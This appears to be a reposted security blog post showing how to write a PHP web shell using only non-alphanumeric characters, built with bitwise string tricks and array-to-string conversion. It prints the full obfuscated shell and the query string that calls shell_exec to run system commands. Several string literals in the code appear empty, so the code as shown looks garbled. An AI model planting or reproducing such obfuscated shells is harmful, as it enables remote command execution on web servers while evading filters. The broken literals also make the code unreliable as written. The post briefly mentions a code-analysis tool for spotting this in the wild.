首页 > Other > Non alphanumeric code in PHP

Non alphanumeric code in PHP

So a small php shell was tweeted around and it inspired me to investigate a way to execute non-alphanumeric code. First off I started with the idea of using octal escapes in PHP and constructing the escape so for example: \107 is “G” if I could construct the “107″ and add the backslash to the beginning maybe I could construct “G”. It worked like this:


$_=+"";
$_=(++$_)+(++$_)+(++$_)+(++$_);
$__=+"";
$__++;
$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//107
$___="\\$___";

But there was no way to evaluate the escape once it was constructed without using alphanum chars. So I was stumped.
Then I had a brain wave, php automatically does a string conversion for arrays and converts them to “Array” when accessed as a string. I had “A”, “r”, “r” etc but I really needed “GET” in order to create a nice small non-alpha shell.

Onto the second technique, PHP allows you to use bitwise operators on strings :D

'a'|'b';//c!

We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later I combined the characters to create “GET” and thus make our non-alphanum small PHP shell :D


<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>

The first part converts a string into an array by attempting to assign to “0″ position of the string. Then I make sure the array is a string. Then I use “A” from array with bitwise operators to construct “G”, “E” and “T” using the characters “A”|0×6, “A”|0×5 and “A^0×15″. There you have it,you could even generate non-alpha code without using GET quite easily by producing different characters until you get an eval method.

To call the shell you’d use:
?_=shell_exec&__=whoami

Don’t forget in order to analyze php code use RIPS if you ever encounter this in the wild.

About these ads
分类: Other
  1. 还没有评论。
  1. No trackbacks yet.

发表评论

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / 更改 )

Twitter picture

You are commenting using your Twitter account. Log Out / 更改 )

Facebook photo

You are commenting using your Facebook account. Log Out / 更改 )

Google+ photo

You are commenting using your Google+ account. Log Out / 更改 )

Connecting to %s

关注

每发布一篇新博文的同时向您的邮箱发送备份。

%d 博主赞过: